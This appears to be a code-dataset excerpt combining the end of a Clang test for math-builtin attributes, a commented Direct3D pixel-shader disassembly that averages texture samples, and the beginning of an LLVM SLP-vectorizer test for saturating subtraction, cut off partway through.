__builtin_fmax(f,f); __builtin_fmaxf(f,f); __builtin_fmaxl(f,f);
// NO__ERRNO: declare double @llvm.maxnum.f64(double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.maxnum.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.maxnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.maxnum.f64(double, double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.maxnum.f32(float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.maxnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
__builtin_fmin(f,f); __builtin_fminf(f,f); __builtin_fminl(f,f);
// NO__ERRNO: declare double @llvm.minnum.f64(double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.minnum.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.minnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.minnum.f64(double, double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.minnum.f32(float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.minnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
__builtin_hypot(f,f); __builtin_hypotf(f,f); __builtin_hypotl(f,f);
// NO__ERRNO: declare double @hypot(double, double) [[READNONE]]
// NO__ERRNO: declare float @hypotf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @hypotl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @hypot(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @hypotf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @hypotl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_ilogb(f); __builtin_ilogbf(f); __builtin_ilogbl(f);
// NO__ERRNO: declare i32 @ilogb(double) [[READNONE]]
// NO__ERRNO: declare i32 @ilogbf(float) [[READNONE]]
// NO__ERRNO: declare i32 @ilogbl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare i32 @ilogb(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i32 @ilogbf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i32 @ilogbl(x86_fp80) [[NOT_READNONE]]
__builtin_lgamma(f); __builtin_lgammaf(f); __builtin_lgammal(f);
// NO__ERRNO: declare double @lgamma(double) [[NOT_READNONE]]
// NO__ERRNO: declare float @lgammaf(float) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @lgammal(x86_fp80) [[NOT_READNONE]]
// HAS_ERRNO: declare double @lgamma(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @lgammaf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @lgammal(x86_fp80) [[NOT_READNONE]]
__builtin_llrint(f); __builtin_llrintf(f); __builtin_llrintl(f);
// NO__ERRNO: declare i64 @llvm.llrint.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llrint.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llrint.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @llrint(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llrintf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llrintl(x86_fp80) [[NOT_READNONE]]
__builtin_llround(f); __builtin_llroundf(f); __builtin_llroundl(f);
// NO__ERRNO: declare i64 @llvm.llround.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llround.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llround.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @llround(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llroundf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llroundl(x86_fp80) [[NOT_READNONE]]
__builtin_log(f); __builtin_logf(f); __builtin_logl(f);
// NO__ERRNO: declare double @llvm.log.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.log.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.log.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @log(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @logf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @logl(x86_fp80) [[NOT_READNONE]]
__builtin_log10(f); __builtin_log10f(f); __builtin_log10l(f);
// NO__ERRNO: declare double @llvm.log10.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.log10.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.log10.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @log10(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @log10f(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @log10l(x86_fp80) [[NOT_READNONE]]
__builtin_log1p(f); __builtin_log1pf(f); __builtin_log1pl(f);
// NO__ERRNO: declare double @log1p(double) [[READNONE]]
// NO__ERRNO: declare float @log1pf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @log1pl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @log1p(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @log1pf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @log1pl(x86_fp80) [[NOT_READNONE]]
__builtin_log2(f); __builtin_log2f(f); __builtin_log2l(f);
// NO__ERRNO: declare double @llvm.log2.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.log2.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.log2.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @log2(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @log2f(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @log2l(x86_fp80) [[NOT_READNONE]]
__builtin_logb(f); __builtin_logbf(f); __builtin_logbl(f);
// NO__ERRNO: declare double @logb(double) [[READNONE]]
// NO__ERRNO: declare float @logbf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @logbl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @logb(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @logbf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @logbl(x86_fp80) [[NOT_READNONE]]
__builtin_lrint(f); __builtin_lrintf(f); __builtin_lrintl(f);
// NO__ERRNO: declare i64 @llvm.lrint.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lrint.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lrint.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @lrint(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lrintf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lrintl(x86_fp80) [[NOT_READNONE]]
__builtin_lround(f); __builtin_lroundf(f); __builtin_lroundl(f);
// NO__ERRNO: declare i64 @llvm.lround.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lround.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lround.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @lround(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lroundf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lroundl(x86_fp80) [[NOT_READNONE]]
__builtin_nearbyint(f); __builtin_nearbyintf(f); __builtin_nearbyintl(f);
// NO__ERRNO: declare double @llvm.nearbyint.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.nearbyint.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.nearbyint.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.nearbyint.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.nearbyint.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.nearbyint.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_nextafter(f,f); __builtin_nextafterf(f,f); __builtin_nextafterl(f,f);
// NO__ERRNO: declare double @nextafter(double, double) [[READNONE]]
// NO__ERRNO: declare float @nextafterf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @nextafterl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @nextafter(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @nextafterf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @nextafterl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_nexttoward(f,f); __builtin_nexttowardf(f,f);__builtin_nexttowardl(f,f);
// NO__ERRNO: declare double @nexttoward(double, x86_fp80) [[READNONE]]
// NO__ERRNO: declare float @nexttowardf(float, x86_fp80) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @nexttowardl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @nexttoward(double, x86_fp80) [[NOT_READNONE]]
// HAS_ERRNO: declare float @nexttowardf(float, x86_fp80) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @nexttowardl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_remainder(f,f); __builtin_remainderf(f,f); __builtin_remainderl(f,f);
// NO__ERRNO: declare double @remainder(double, double) [[READNONE]]
// NO__ERRNO: declare float @remainderf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @remainderl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @remainder(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @remainderf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @remainderl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_remquo(f,f,i); __builtin_remquof(f,f,i); __builtin_remquol(f,f,i);
// NO__ERRNO: declare double @remquo(double, double, i32*) [[NOT_READNONE]]
// NO__ERRNO: declare float @remquof(float, float, i32*) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @remquol(x86_fp80, x86_fp80, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare double @remquo(double, double, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare float @remquof(float, float, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @remquol(x86_fp80, x86_fp80, i32*) [[NOT_READNONE]]
__builtin_rint(f); __builtin_rintf(f); __builtin_rintl(f);
// NO__ERRNO: declare double @llvm.rint.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.rint.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.rint.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.rint.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.rint.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.rint.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_round(f); __builtin_roundf(f); __builtin_roundl(f);
// NO__ERRNO: declare double @llvm.round.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.round.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.round.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.round.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.round.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.round.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_scalbln(f,f); __builtin_scalblnf(f,f); __builtin_scalblnl(f,f);
// NO__ERRNO: declare double @scalbln(double, i64) [[READNONE]]
// NO__ERRNO: declare float @scalblnf(float, i64) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @scalblnl(x86_fp80, i64) [[READNONE]]
// HAS_ERRNO: declare double @scalbln(double, i64) [[NOT_READNONE]]
// HAS_ERRNO: declare float @scalblnf(float, i64) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @scalblnl(x86_fp80, i64) [[NOT_READNONE]]
__builtin_scalbn(f,f); __builtin_scalbnf(f,f); __builtin_scalbnl(f,f);
// NO__ERRNO: declare double @scalbn(double, i32) [[READNONE]]
// NO__ERRNO: declare float @scalbnf(float, i32) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @scalbnl(x86_fp80, i32) [[READNONE]]
// HAS_ERRNO: declare double @scalbn(double, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare float @scalbnf(float, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @scalbnl(x86_fp80, i32) [[NOT_READNONE]]
__builtin_sin(f); __builtin_sinf(f); __builtin_sinl(f);
// NO__ERRNO: declare double @llvm.sin.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.sin.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.sin.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @sin(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @sinf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @sinl(x86_fp80) [[NOT_READNONE]]
__builtin_sinh(f); __builtin_sinhf(f); __builtin_sinhl(f);
// NO__ERRNO: declare double @sinh(double) [[READNONE]]
// NO__ERRNO: declare float @sinhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @sinhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @sinh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @sinhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @sinhl(x86_fp80) [[NOT_READNONE]]
__builtin_sqrt(f); __builtin_sqrtf(f); __builtin_sqrtl(f);
// NO__ERRNO: declare double @llvm.sqrt.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.sqrt.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.sqrt.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @sqrt(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @sqrtf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @sqrtl(x86_fp80) [[NOT_READNONE]]
__builtin_tan(f); __builtin_tanf(f); __builtin_tanl(f);
// NO__ERRNO: declare double @tan(double) [[READNONE]]
// NO__ERRNO: declare float @tanf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @tanl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @tan(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @tanf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @tanl(x86_fp80) [[NOT_READNONE]]
__builtin_tanh(f); __builtin_tanhf(f); __builtin_tanhl(f);
// NO__ERRNO: declare double @tanh(double) [[READNONE]]
// NO__ERRNO: declare float @tanhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @tanhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @tanh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @tanhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @tanhl(x86_fp80) [[NOT_READNONE]]
__builtin_tgamma(f); __builtin_tgammaf(f); __builtin_tgammal(f);
// NO__ERRNO: declare double @tgamma(double) [[READNONE]]
// NO__ERRNO: declare float @tgammaf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @tgammal(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @tgamma(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @tgammaf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @tgammal(x86_fp80) [[NOT_READNONE]]
__builtin_trunc(f); __builtin_truncf(f); __builtin_truncl(f);
// NO__ERRNO: declare double @llvm.trunc.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.trunc.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.trunc.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.trunc.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.trunc.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.trunc.f80(x86_fp80) [[READNONE_INTRINSIC]]
};
// NO__ERRNO: attributes [[READNONE]] = { {{.*}}readnone{{.*}} }
// NO__ERRNO: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// NO__ERRNO: attributes [[NOT_READNONE]] = { nounwind "correctly{{.*}} }
// NO__ERRNO: attributes [[PURE]] = { {{.*}}readonly{{.*}} }
// HAS_ERRNO: attributes [[NOT_READNONE]] = { nounwind "correctly{{.*}} }
// HAS_ERRNO: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO: attributes [[PURE]] = { {{.*}}readonly{{.*}} }
// HAS_ERRNO: attributes [[READNONE]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO_GNU: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO_ANDROID: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO_WIN: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
| {
"language": "Assembly"
} |
//
// Generated by Microsoft (R) D3D Shader Disassembler
//
//
// Input signature:
//
// Name                 Index   Mask Register SysValue  Format   Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_POSITION              0   xyzw        0      POS   float
// TEXCOORD                 0   xy          1     NONE   float   xy
//
//
// Output signature:
//
// Name                 Index   Mask Register SysValue  Format   Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_Target                0   xyzw        0   TARGET   float   xyzw
//
// Pixel shader: averages a run of texture samples taken along the V axis
// starting at the interpolated texcoord v1.xy.
//   cb0[0].y = per-iteration V step
//   cb0[0].z = first loop index (inclusive)
//   cb0[0].w = last loop index (inclusive)
// Two channels of each sample are accumulated; their averages are written
// to o0.xy and o0.zw is cleared.
// NOTE(review): which source channels land in the accumulator depends on the
// t0.zxyw return swizzle — confirm against the HLSL that produced this.
ps_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer cb0[1], immediateIndexed
dcl_sampler s0, mode_default
dcl_resource_texture2d (float,float,float,float) t0
dcl_input_ps linear v1.xy
dcl_output o0.xyzw
dcl_temps 2
// r0.x = 0 (U offset is constant zero); r0.zw = running channel sums.
mov r0.x, l(0)
mov r0.zw, l(0,0,0,0)
// r1.x = integer loop counter, starts at cb0[0].z.
mov r1.x, cb0[0].z
loop
  // Break once the counter passes cb0[0].w (ilt: r1.y = cb0[0].w < r1.x).
  ilt r1.y, cb0[0].w, r1.x
  breakc_nz r1.y
  // r0.y = float(i) * cb0[0].y — V offset for this iteration.
  itof r1.y, r1.x
  mul r0.y, r1.y, cb0[0].y
  // Sample coords: u = r0.x + v1.x, v = r0.y + v1.y.
  add r1.yz, r0.xxyx, v1.xxyx
  sample_indexable(texture2d)(float,float,float,float) r1.yz, r1.yzyy, t0.zxyw, s0
  // Accumulate the two sampled channels: r0.z += r1.y, r0.w += r1.z.
  add r0.zw, r0.zzzw, r1.yyyz
  iadd r1.x, r1.x, l(1)
endloop
// Sample count = (cb0[0].w - cb0[0].z) + 1; divide the sums by it.
iadd r0.x, -cb0[0].z, cb0[0].w
itof r0.x, r0.x
add r0.x, r0.x, l(1.000000)
div o0.xy, r0.zwzz, r0.xxxx
mov o0.zw, l(0,0,0,0)
ret
// Approximately 0 instruction slots used
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -mtriple=x86_64-unknown -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,SSE
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=slm -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,SLM
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=corei7-avx -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX,AVX1
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=core-avx2 -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX,AVX2
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=knl -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX512,AVX512F
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=skx -mattr=-prefer-256-bit -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX512,AVX512BW
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=skx -mattr=+prefer-256-bit -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX,AVX256BW
@a64 = common global [8 x i64] zeroinitializer, align 64
@b64 = common global [8 x i64] zeroinitializer, align 64
@c64 = common global [8 x i64] zeroinitializer, align 64
@a32 = common global [16 x i32] zeroinitializer, align 64
@b32 = common global [16 x i32] zeroinitializer, align 64
@c32 = common global [16 x i32] zeroinitializer, align 64
@a16 = common global [32 x i16] zeroinitializer, align 64
@b16 = common global [32 x i16] zeroinitializer, align 64
@c16 = common global [32 x i16] zeroinitializer, align 64
@a8 = common global [64 x i8] zeroinitializer, align 64
@b8 = common global [64 x i8] zeroinitializer, align 64
@c8 = common global [64 x i8] zeroinitializer, align 64
declare i64 @llvm.ssub.sat.i64(i64, i64)
declare i32 @llvm.ssub.sat.i32(i32, i32)
declare i16 @llvm.ssub.sat.i16(i16, i16)
declare i8 @llvm.ssub.sat.i8 (i8 , i8 )
; 8 x i64 saturating subtract: scalar @llvm.ssub.sat.i64 over @a64/@b64 into
; @c64.  The autogenerated FileCheck lines below pin the SLP-vectorized shape
; per target: SSE/SLM stay scalar (no native 64-bit saturating sub), AVX1
; widens to four <2 x i64> calls, AVX2/AVX256BW to two <4 x i64>, and AVX512
; to a single <8 x i64> call.  The IR body must stay byte-identical to what
; utils/update_test_checks.py generated from.
define void @sub_v8i64() {
; SSE-LABEL: @sub_v8i64(
; SSE-NEXT:    [[A0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 0), align 8
; SSE-NEXT:    [[A1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 1), align 8
; SSE-NEXT:    [[A2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2), align 8
; SSE-NEXT:    [[A3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 3), align 8
; SSE-NEXT:    [[A4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4), align 8
; SSE-NEXT:    [[A5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 5), align 8
; SSE-NEXT:    [[A6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6), align 8
; SSE-NEXT:    [[A7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 7), align 8
; SSE-NEXT:    [[B0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 0), align 8
; SSE-NEXT:    [[B1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 1), align 8
; SSE-NEXT:    [[B2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2), align 8
; SSE-NEXT:    [[B3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 3), align 8
; SSE-NEXT:    [[B4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4), align 8
; SSE-NEXT:    [[B5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 5), align 8
; SSE-NEXT:    [[B6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6), align 8
; SSE-NEXT:    [[B7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 7), align 8
; SSE-NEXT:    [[R0:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A0]], i64 [[B0]])
; SSE-NEXT:    [[R1:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A1]], i64 [[B1]])
; SSE-NEXT:    [[R2:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A2]], i64 [[B2]])
; SSE-NEXT:    [[R3:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A3]], i64 [[B3]])
; SSE-NEXT:    [[R4:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A4]], i64 [[B4]])
; SSE-NEXT:    [[R5:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A5]], i64 [[B5]])
; SSE-NEXT:    [[R6:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A6]], i64 [[B6]])
; SSE-NEXT:    [[R7:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A7]], i64 [[B7]])
; SSE-NEXT:    store i64 [[R0]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 0), align 8
; SSE-NEXT:    store i64 [[R1]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 1), align 8
; SSE-NEXT:    store i64 [[R2]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2), align 8
; SSE-NEXT:    store i64 [[R3]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 3), align 8
; SSE-NEXT:    store i64 [[R4]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4), align 8
; SSE-NEXT:    store i64 [[R5]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 5), align 8
; SSE-NEXT:    store i64 [[R6]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6), align 8
; SSE-NEXT:    store i64 [[R7]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 7), align 8
; SSE-NEXT:    ret void
;
; SLM-LABEL: @sub_v8i64(
; SLM-NEXT:    [[A0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 0), align 8
; SLM-NEXT:    [[A1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 1), align 8
; SLM-NEXT:    [[A2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2), align 8
; SLM-NEXT:    [[A3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 3), align 8
; SLM-NEXT:    [[A4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4), align 8
; SLM-NEXT:    [[A5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 5), align 8
; SLM-NEXT:    [[A6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6), align 8
; SLM-NEXT:    [[A7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 7), align 8
; SLM-NEXT:    [[B0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 0), align 8
; SLM-NEXT:    [[B1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 1), align 8
; SLM-NEXT:    [[B2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2), align 8
; SLM-NEXT:    [[B3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 3), align 8
; SLM-NEXT:    [[B4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4), align 8
; SLM-NEXT:    [[B5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 5), align 8
; SLM-NEXT:    [[B6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6), align 8
; SLM-NEXT:    [[B7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 7), align 8
